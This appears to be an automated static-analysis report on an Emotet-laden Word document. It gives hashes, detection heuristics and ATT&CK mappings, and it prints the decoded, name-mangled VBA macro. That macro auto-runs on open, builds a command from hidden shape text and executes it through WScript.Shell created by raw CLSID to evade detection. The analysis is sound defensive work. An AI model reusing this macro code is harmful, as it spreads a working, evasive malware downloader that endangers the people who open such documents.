Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c545b1eed0f4a135…

MALICIOUS

Office (OLE)

Size: 126.3 KB
Created: 2018-11-28 16:27:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 772e7caabe353d9eb91387092cb7b933
SHA-1: 9b7e18e1083777b9166b2c9ca3815f59abfb3d66
SHA-256: c545b1eed0f4a1359bd102a107e982d1013d782a9c7d6e0fbc436c3f5c83b971
Risk score: 252

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function, which is a common technique for Emotet. The macros instantiate the dangerous COM class WScript.Shell and reference PowerShell, indicating an attempt to download and execute a second-stage payload. ClamAV detection further supports the Emotet family attribution.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6826446-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826446-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS)
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
       End Select
    Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
       On Error Resume Next
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script
       End Select
    Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
       On Error Resume Next
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5001 bytes
SHA-256: 91524fbfb3a552d96b10feec9f1abe40069d4b908c784baa9e8fd0e0a6770cd4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
112 of 173 identifiers look randomly generated (e.g. 'NhQLQfwlaBSJn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iHOBqSAldadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case rssVuadT
      Case 7431461
         bcPiiiK = CBool(GnVMX)
         cRvtrcHL = 131039611
HudsIUj = CBool(OwOPq)

      Case 145014689
BzKzRTiVD = CBool(cfjcYRPIp)
         oFRvlHM = Atn(aaMbZupdz)
CGcYaz = CBool(pzhpfwHB)
         KwhOMKHju = Atn(190796375 * CLng(217435300))
   End Select
Set pmuUB = Shapes("NhQLQfwlaBSJn")
   On Error Resume Next
Select Case bGtwlAO
      Case 234272584
         lhAlL = CBool(kNliC)
         jobhj = 241503370
WYjvpCIBA = CBool(ZwnjvJjNM)

      Case 36830349
rKNWZVuRS = CBool(BPXMdF)
         LjCAjPLi = Atn(XlfrUX)
sfNTZQj = CBool(jijXjP)
         SEwCdCz = Atn(50389999 * CLng(309798784))
   End Select
WzKifFWORWi = "" + fhPmMvC + wJmaw + AjoBzA + tRtcuXS + pmuUB.TextFrame.TextRange.Text + pDSlHaO + GiEzIkt + jikIk + LNmKz + UbpTkTsw
   On Error Resume Next
Select Case rHYfT
      Case 283156215
         mTlapsdw = CBool(KazuGNRok)
         nCYvz = 268195053
EStiwcZo = CBool(widBQn)

      Case 149083892
CoLEvipj = CBool(KDkOXolGn)
         CONwYF = Atn(RnLisAfss)
diIoE = CBool(CSWEBYqru)
         cURpqnw = Atn(29794688 * CLng(83148233))
   End Select
   On Error Resume Next
Select Case tiWhQtm
      Case 116477639
         jIKwtM = CBool(BCtmQBzm)
         ClrtdmQh = 210593100
YHjzTfP = CBool(FTsaaEK)

      Case 136987834
wdNsijzOH = CBool(YltrcSUnc)
         FZHBWtT = Atn(bLmjJwUES)
qXiiMkrs = CBool(bPIFQh)
         kWWMVoQGm = Atn(317801614 * CLng(56140133))
   End Select
Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
   On Error Resume Next
Select Case zNrwwL
      Case 68721804
         otcqjXQU = CBool(BWjFsCc)
         cTNEtvM = 151166701
XijmhD = CBool(dwwhnrN)

      Case 159090100
JZjJMFKP = CBool(TrwcuzP)
         PzhkkU = Atn(GbvEvl)
GpRkWfND = CBool(YTMNLd)
         BBRTb = Atn(87935855 * CLng(282064522))
   End Select
   On Error Resume Next
Select Case hpIwX
      Case 110413520
         pGmSwRUXM = CBool(NHfBvFU)
         TDjMDT = 6529678
MPllw = CBool(FftuXj)

      Case 263227701
AuFPMS = CBool(DmkohDN)
         dDTRvF = Atn(maiwC)
IAhnd = CBool(CpGoG)
         aIdAzPMr = Atn(101102913 * CLng(106969043))
   End Select
Const RmcCa = 0
   On Error Resume Next
Select Case pmaMFKnK
      Case 293360880
         jcDLa = CBool(HjiXiGm)
         ZMmTZDZz = 126278805
kSBEvQL = CBool(CzPLrC)

      Case 85041545
OcZUCiz = CBool(nsXUlociJ)
         bHXDkOM = Atn(EpSNUk)
wpzYw = CBool(CTJRDsq)
         NUhCRaF = Atn(22526869 * CLng(74229139))
   End Select
   On Error Resume Next
Select Case ZWprZjMP
      Case 211837363
         kAwHZJPD = CBool(WXsHuwKTz)
         YrRAahHlD = 193622773
GuMRjLSJk = CBool(uOIBI)

      Case 216439552
vsONPW = CBool(qSzYZ)
         YMatQd = Atn(qOmsJMki)
JzSAspK = CBool(jrYEaN)
         tkRkio = Atn(92914447 * CLng(244321475))
   End Select
   On Error Resume Next
Select Case RZbIIz
      Case 172545123
         fPdiTNI = CBool(UtuvVBKNz)
         BflPU = 213595769
siCSP = CBool(nrZPIL)

      Case 17009969
jwtYK = CBool(MuPONKBz)
         tPuwbaiGi = Atn(aGEvm)
CvzVi = CBool(rKuuwPnEE)
         qwjzNO = Atn(176355816 * CLng(228591513))
   End Select
   On Error Resume Next
Select Case NjfbdM
      Case 300889489
         dXqSa = CBool(wjpZYv)
         ETZALmtb = 221284423
jLzCYjLKa = CBool(HtVlFzA)

      Case 266104435
wAUuWI = CBool(FbRazf)
         fJHdMaAiP = Atn(UhKzouLlF)
lrLRat = CBool(iksza)
         zqbwWnO = Atn(102803920 * CLng(121113587))
   End Select
   On Error Resume Next
Select Case TASoZLpmA
      Case 259174217
         pOUcNrUa = CBool(VJBcfuAPt)
         bfNUjKiGF = 301322238
CokWtdL = CBool(OwuObVK)

      Case 336269912
JiKatELIc = CBool(kSflPjYSU)
         FlRplf = Atn(hRlwZKswa)
zJjZORjb = CBool(iNiiDC)
         ijXNVpOIi = Atn(284168830 * CLng(281235694))
   End Select
lWpSaF.Run# WzKifFWORWi, RmcCa
   On Error Resume Next
Select Case SwXPMw
      Case 264960689
         WvcDizt = CBool(cklritc)
         ialXMJWUH = 298761793
XZTvEiIl = CBool(dIwvdO)

      Case 311931377
sMmYUclm = CBool(QQNYI)
         pRWFJpjJW = Atn(QRWiq)
zNkbuHHDw = CBool(JuRsXnVM)
         dHJmw = Atn(79740558 * CLng(21389483))
   End Select
   On Error Resume Next
Select Case YOYjilLEj
      Case 107707173
         DYshJzQXc = CBool(oknNw)
         EjoWcuC = 301418533
QLCKdIVWT = CBool(juVTKCz)

      Case 131585393
jilSkLHU = CBool(uOIWwotmO)
         wATOTk = Atn(fiPdTf)
RJOisSz = CBool(oabFTMw)
         aYokVkQQ = Atn(121684110 * CLng(224527147))
   End Select
End Sub